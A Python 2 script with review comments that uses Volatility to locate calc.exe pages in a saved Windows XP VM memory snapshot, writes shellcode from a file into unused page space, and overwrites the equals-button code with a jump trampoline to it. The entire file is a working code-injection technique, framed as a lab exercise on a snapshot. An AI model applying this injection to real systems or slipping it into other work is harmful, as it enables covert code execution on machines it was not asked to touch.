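#coding=utf-8
# Patch a saved Windows XP SP3 guest memory snapshot (.vmem) on disk.
# Volatility 2.3.1 (Python 2.7 only, hence the print()-compatible Python 2
# style below) is used to walk calc.exe's pages and translate virtual
# addresses to physical offsets in the snapshot file. Two writes are made:
#   1. the contents of cmeasure.bin go into a run of NUL bytes found inside
#      one of calc.exe's pages ("slack space");
#   2. a 7-byte trampoline (mov ebx, <slack va> ; jmp ebx) overwrites the code
#      at `equals_button` so that code path now lands in the injected bytes.
import sys
import struct

# Virtual address inside calc.exe that the trampoline overwrites.
equals_button = 0x01005D51
memory_file = "WinXPenSP3-Snapshot8.vmem"
slack_space = None        # virtual address chosen for the injected bytes
trampoline_offset = None  # physical file offset of equals_button
tramp = None              # trampoline bytes; built once slack_space is known

# Read in our shellcode.
with open("cmeasure.bin", "rb") as sc_fd:
    sc = sc_fd.read()

# Raw string: in a normal literal "\v" in "C:\Python27\volatility-2.3.1" is a
# vertical-tab escape, so the appended path would never have matched.
sys.path.append(r"C:\Python27\volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
config.PROFILE = "WinXPSP3x86"
# Was misspelled "LOCALTION", which Volatility would not read as the image
# location; LOCATION is the real option.
config.LOCATION = "file://%s" % memory_file
import volatility.plugins.taskmods as taskmods

# mov ebx, imm32 (opcode 0xBB + 4 bytes) plus jmp ebx (0xFF 0xE3) = 7 bytes;
# the target must lie at least this far from the end of its page.
TRAMPOLINE_SIZE = 7

p = taskmods.PSList(config)
for process in p.calculate():
    if str(process.ImageFileName) != "calc.exe":
        continue
    print("[*] Found calc.exe with PID %d" % process.UniqueProcessId)
    print("[*] Hunting for physical offsets...please wait.")
    address_space = process.get_process_address_space()
    for page in address_space.get_available_pages():
        # page is (virtual address, size); vtop gives None for unmapped pages.
        physical = address_space.vtop(page[0])
        if physical is None:
            continue
        if slack_space is None:
            # "r+b", not "r+": on Windows text mode translates line endings
            # on both read and write, corrupting offsets and the bytes written.
            with open(memory_file, "r+b") as fd:
                fd.seek(physical)
                buf = fd.read(page[1])
                # str.find instead of index + bare except: only "not found"
                # is expected here, and a failed write must not be swallowed.
                offset = buf.find("\x00" * len(sc))
                if offset != -1:
                    slack_space = page[0] + offset
                    print("[*] Found good shellcode location!")
                    print("[*] Virtual address: 0x%08x" % slack_space)
                    print("[*] Physical address: 0x%08x" % (physical + offset))
                    print("[*] Injecting shellcode.")
                    fd.seek(physical + offset)
                    fd.write(sc)
            if slack_space is not None:
                # Build our trampoline: mov ebx, slack_space ; jmp ebx.
                # NOTE(review): the pack format was truncated in the source;
                # "<L" (little-endian DWORD) is what the imm32 operand needs.
                tramp = "\xbb" + struct.pack("<L", slack_space) + "\xff\xe3"
                if trampoline_offset is not None:
                    break
        # Check whether this page holds the target code.
        if page[0] <= equals_button < (page[0] + page[1]) - TRAMPOLINE_SIZE:
            print("[*] Found our trampoline target at: 0x%08x" % physical)
            # Virtual offset of the target within its page. The source had
            # "equals_button = page[0]" (assignment), which clobbered the
            # target address and produced a bogus physical offset.
            v_offset = equals_button - page[0]
            # Physical offset of the target in the snapshot file.
            trampoline_offset = physical + v_offset
            print("[*] Found our trampoline target at: 0x%08x" % trampoline_offset)
            if slack_space is not None:
                break
    if tramp is None or trampoline_offset is None:
        # Without both halves the original fell through to a NameError on
        # tramp or a seek(None); report instead of writing a partial patch.
        print("[*] Shellcode location or trampoline target not found; nothing written.")
        continue
    print("[*] Writing trampoline...")
    with open(memory_file, "r+b") as fd:
        fd.seek(trampoline_offset)
        fd.write(tramp)  # was f.close() below: `f` was never defined
    print("[*] Done injecting code.")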